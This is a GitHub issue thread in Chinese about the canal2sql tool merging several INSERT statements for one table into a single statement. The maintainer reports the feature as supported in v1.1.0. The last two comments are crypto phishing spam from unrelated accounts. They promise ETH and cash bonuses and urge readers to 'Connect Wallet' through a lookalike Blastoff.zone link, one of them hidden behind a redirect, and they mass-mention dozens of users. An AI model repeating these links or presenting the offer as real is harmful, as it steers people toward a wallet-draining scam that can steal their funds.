### ISSUE TITLE
支持一张表的多条语句合并成一条语句吗，

### ISSUE THREAD

**Issue by zmix999** [zhuchao941/canal2sql#1]
支持一张表的多条语句合并成一条语句吗，比如;
INSERT INTO TABL_NAME VALUES (A,A),(B,B);

**Comment by zhuchao941** [comment]
暂时不支持
不过如果强烈需要的话 单事务内的insert合并应该也可以做
方便了解一下你具体是什么场景吗

**Comment by zhuchao941** [comment]
@zmix999 
https://github.com/zhuchao941/canal2sql/releases/tag/v1.1.0 已支持
![image](https://github.com/zhuchao941/canal2sql/assets/9283968/612214e7-6d97-4213-8dc4-7abe1e7d400c)

**Comment by zmix999** [comment]
好的十分感谢，我测试一下，有遇到过回滚的数据量比较多的情况，每行数据生成一条语句的话，回滚会很慢。

**Comment by ichikawa-itbook** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
renhe, @yangzhen1997, @rangerTao, @udpsec, @cugerQDHJ, @xRay2016, @zwhbin, @wuyeguangming, @chengchengccc, @AbrMain, @acoolladoggy, @GGCCCC, @oneMoreTime1357, @chenjuntong, @qq1635161064, @putin, @1326633265, @Sidamor, @leeeasy, @zqp2013, @ssyangy, @lolo-pop, @tingnapianhai, @nigolasi, @xtyHY, @Jiangxiaoyuan, @marqueurs404, @yangchandle, @lizhecome, @shuaibird, @cathing, @xibinyue, @qso, @Redoblue, @JavaCS3, @melodyjerry, @HuYunhai-Alex, @sdnjly, @MoseChan, @wave2future, @xiaohuahou, @chuckding25, @jmy12k3, @tanaxjun, @floiges, @Gaogui, @YJCsgyx, @yili1992, @FongSGF, @rayarayzheng

**Comment by manubouillon** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
fzfd, @NongChen1223, @CkenKenan, @xchehub, @yooomi, @jacky7788, @crrtty, @jucky1, @lanxingjue, @lyonnee, @kinginconntry, @RacerZ-fighting, @kakugg, @amosaustin, @wuxiaowu63700, @paopaolin, @greekRight, @cantguardyoung, @sovo-code, @CSKOI, @vgantchev, @rain-strom, @zdp82398328, @Helen6663, @vonjk, @fugangcui, @dongweizhao, @wtyi, @a754962942, @wanxiankai, @awmpy, @CHNzhonghongwei, @lengxu, @snakeeeeeeeee, @EndOfMaster, @thinkslowsol, @sunwk, @AceSen, @cppfuns, @JD-Wang, @2exd, @DarlingZhangsh, @AC-greener, @ukexim13, @M11158002, @ouyang913, @Jerry521610, @Jennal, @ccinv, @icafe
